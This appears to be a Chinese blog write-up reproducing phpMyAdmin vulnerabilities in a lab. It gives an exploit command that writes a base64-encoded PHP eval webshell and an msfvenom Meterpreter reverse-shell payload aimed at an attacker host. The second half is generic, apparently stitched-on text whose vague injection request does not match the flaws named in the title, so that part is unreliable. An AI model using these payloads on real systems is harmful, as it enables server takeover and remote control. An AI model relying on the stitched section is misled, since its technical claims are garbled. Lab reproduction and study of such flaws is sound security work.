【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞

CVE-2016-5734

1.访问8080端口,用弱口令root root登录

2. 在Kali中有自带的EXP:

searchsploit phpmyadmin

3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马:

python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"

4.用蚁剑连接:

5.然后通过msfvenom生成木马:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.225.133 LPORT=2333 -f elf>/root/sa.elf

6.通过蚁剑把sa.elf上传到容器的/tmp环境下,/tmp环境是临时文件目录普通用户的权限都比较大

### 漏洞复现步骤 phpMyAdmin 是一个基于 Web 的 MySQL 数据库管理工具,广泛用于 Web 开发中。由于其广泛使用,针对其漏洞的攻击也较为常见。在特定版本中,存在一个通杀漏洞,允许攻击者通过构造恶意请求执行任意代码。 #### 漏洞复现步骤 1. **环境搭建**:首先需要搭建一个包含 phpMyAdmin 的测试环境。可以使用 Docker 或者本地安装 Apache、MySQL 和 phpMyAdmin。确保 phpMyAdmin 的版本为受影响版本(如 4.8.0 或 4.8.1)[^1]。 2. **构造恶意请求**:利用该漏洞的关键在于构造一个特定的 HTTP 请求,该请求能够触发 phpMyAdmin 中的代码注入漏洞。通常,攻击者会利用 `index.php` 文件中的参数注入点,通过 `db` 或 `table` 参数传递恶意代码。 ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1 ``` 3. **注入代码**:在请求中,攻击者可以注入 PHP 代码,这些代码将在服务器端执行。例如,可以注入一个简单的 `phpinfo()` 函数来验证漏洞是否存在。 ```php <?php phpinfo(); ?> ``` 4. **验证漏洞**:发送请求后,检查服务器响应是否包含 `phpinfo()` 的输出。如果存在,则表明漏洞成功触发。 5. **进一步利用**:一旦确认漏洞存在,攻击者可以上传更复杂的后门脚本,如 Web Shell,以获得对服务器的持久访问权限。 ### 安全研究 #### 影响范围 该漏洞影响了多个版本的 phpMyAdmin,特别是 4.8.0 和 4.8.1 版本。攻击者可以通过此漏洞在目标服务器上执行任意代码,进而获取敏感数据或控制服务器。 #### 修复建议 1. **升级版本**:官方在 4.8.2 版本中修复了该漏洞。建议用户尽快升级到最新版本。 2. **输入验证**:加强对用户输入的验证,防止恶意代码的注入。 3. **最小权限原则**:确保 phpMyAdmin 使用的数据库账户仅具有必要的最小权限,以减少潜在攻击的影响范围。 4. **定期更新**:保持 phpMyAdmin 及其依赖组件的定期更新,及时修补已知漏洞。 5. **安全审计**:定期对 Web 应用进行安全审计,发现并修复潜在的安全隐患。 #### 防御措施 - **防火墙配置**:配置 Web 应用防火墙(WAF),过滤异常请求,阻止恶意流量。 - **日志监控**:启用详细的日志记录,监控可疑活动,及时发现并响应攻击行为。 - **安全意识培训**:提高开发人员和运维人员的安全意识,避免常见的安全错误。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值